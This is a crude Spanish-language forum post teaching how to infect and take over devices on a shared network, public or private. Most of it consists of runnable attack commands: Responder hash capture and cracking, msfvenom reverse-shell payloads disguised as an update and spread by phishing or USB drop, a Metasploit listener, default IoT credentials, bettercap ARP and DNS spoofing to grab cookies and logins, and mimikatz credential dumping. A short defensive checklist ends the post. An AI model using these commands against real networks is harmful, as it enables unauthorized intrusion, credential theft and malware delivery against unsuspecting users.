😏 Como infectar un dispositivo dentro de tu misma red 😏


MatarFuma

Miembro muy activo
En este post te voy a enseñar lo básico para poder infectar dispositivos conectados a nuestra misma red, puede ser pública o privada, nos suda la polla basto. Nuestro objetivo va a ser obtener una puta shell o algo del palo sobre un dispositivo con windows, linux, IoT o lo que pollas sea.

Reconocimiento

El primer paso será hacer un breve reconocimiento de los dispositivos en red, para ver sobre lo que vamos a tener que trabajar para ello podemos ejecutar los siguientes comandos

Escaneo pasivo:
Código:
arp -a                # Tabla ARP local (básico, rápido)
netdiscover -r 192.168.1.0/24

Escaneo activo con información de OS y puertos:
nmap -sS -T4 -p- -O -sV 192.168.1.0/24 --open

Escaneo visual y más detallado:
sudo nmap -A -T4 -oN fullscan.txt 192.168.1.0/24

Explora con nbtscan y smbclient:
Código:
nbtscan -r 192.168.1.0/24
smbclient -L //192.168.1.X/ -N

Una vez escaneados los dispositivos tendremos que emplear un método diferente para cada caso, te dejo los más comunes pedazo de gordo.

1.- Compartidos SMB

Revisar si puedes acceder sin credenciales, si estás empezando en htb esto te resultará familiar:
smbclient -L //192.168.1.X/ -N

Si ves algo tipo:
Código:
Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       Remote IPC
public          Disk      Public Share

smbclient //192.168.1.X/public -N

Si tienes permisos de escritura:
put payload.exe

Otras herramientas útiles:
Código:
crackmapexec smb 192.168.1.0/24 --shares
enum4linux-ng -A 192.168.1.X

2.- Ataques LLMNR/NBNS + Responder

Algo que tienes que saber es que cualquier red con Windows es vulnerable si algún retrasado no desactivó el LLMNR/NBNS.

Lanzamos el Responder:
sudo responder -I wlan0 -v

Captura hash NTLMv2:
Código:
[SMB] NTLMv2-SSP Client : 192.168.1.15
[SMB] NTLMv2-SSP Username : PC-USER\victim
[SMB] NTLMv2-SSP Hash : victim::PC-USER:112233...:112233...

Crackea con john o hashcat:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

¿Tienes el pass? Entra:
psexec.py victim:contraseña@192.168.1.15

O con crackmapexec:
crackmapexec smb 192.168.1.15 -u victim -p contraseña --exec-method smbexec

También puedes usar Multirelay para inyectar directamente sin password 😛.

3.- Ingeniería Social + Payload (Este es el más mierda de todos pero funciona aunque parezca que no)

Creamos el payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o actualizacion.exe

Opcional: firmarlo o bindearlo con otro .exe real:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x calc.exe -f exe -o camuflado.exe

Entrega:
  • Por SMB compartido
  • Phishing (correo interno, WhatsApp, QR, USB drop, etc.)
  • Hosting con HTTP simple:
python3 -m http.server 8080

Escuchas con Metasploit:
Código:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run

Cuando haga doble clic, entras con:
Código:
meterpreter > sysinfo
meterpreter > shell

4.- Abuso de protocolos inseguros

Si hay impresoras, routers o IoTs en la red, escanea así:
nmap -p 23,80,554,8000,8080,8888 192.168.1.0/24 --open

Prueba conexiones:
Código:
telnet 192.168.1.45
ssh admin@192.168.1.45

Credenciales por defecto:
admin:admin
root:toor
user:1234

Bases de datos comunes:
Código:
ftp 192.168.1.50
mysql -h 192.168.1.50 -u root -p

Si hay interfaz web: fuzz con ffuf o gobuster:
gobuster dir -u http://192.168.1.45/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Revisa exploits con:
searchsploit tplink

5.- Envenenamiento de red (ARP spoofing + DNS Spoof)

ARP Spoof + Sniffing con Bettercap:


sudo bettercap -iface wlan0

En consola interactiva:
Código:
net.probe on
net.recon on
set arp.spoof.targets 192.168.1.45
arp.spoof on
net.sniff on

Captura POSTs, cookies, FTP creds...

DNS Spoofing:

En bettercap:
Código:
set dns.spoof.domains google.com,youtube.com
set dns.spoof.address 192.168.1.100
dns.spoof on

Ahora todo lo que intente abrir google.com irá a tu IP.

6.- Post-infección: moverse lateralmente

¿Ya tienes acceso a un host? Saca las creds guardadas:
Código:
mimikatz
sekurlsa::logonpasswords

Luego:
wmiexec.py domain/user:pass@host

Revisa redes con:
Código:
arp -a
route print
ipconfig /all

Enumera con BloodHound o PowerView si es entorno Windows, esto nos facilitará poder pivotar en el caso de quererlo en un futuro.

De nuevo para todos esos frikis que sean del blue team...
  • Desactiva LLMNR/NBNS
  • Segmenta IoT y usuarios
  • Usa detección ARP spoof y Responder
  • Apaga SMBv1 y servicios innecesarios
  • Aplica credenciales fuertes y rotación
  • Monitoriza logs (Sysmon, Wireshark, ELK)
Antes de que me digan que enseñe a instalar los rollos, esto es un post génerico, si tienes el parrot de htb todas estas herramientas vienen instaladas, no me vengan con historias.